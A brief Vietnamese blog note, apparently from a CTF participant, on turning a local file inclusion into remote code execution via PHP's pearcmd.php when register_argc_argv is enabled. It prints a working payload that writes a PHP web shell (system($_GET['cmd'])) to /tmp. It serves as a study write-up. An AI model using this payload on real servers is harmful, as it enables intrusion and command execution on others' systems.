Mình đã học kĩ thuật mới như thế nào (từ angstromctf và tamuctf) :v
Pearcmd.php wao một file thật thú zị, nó có vẻ cho mình RCE :D
cụ thể payload khi ta biết lfi ?page=/usr/local/lib/php/pearcmd.php&+config-create+/&/<?=system($_GET['cmd']);?>+/tmp/kon.php
với điều kiện là register_argc_argv được bật, bản thân là 1 cli argument nhưng khi được bật thì sẽ nhận requests argument thay cho cli argument.
zậy thôi :>
cute hongDid you mean 哦
Nhận xét
Đăng nhận xét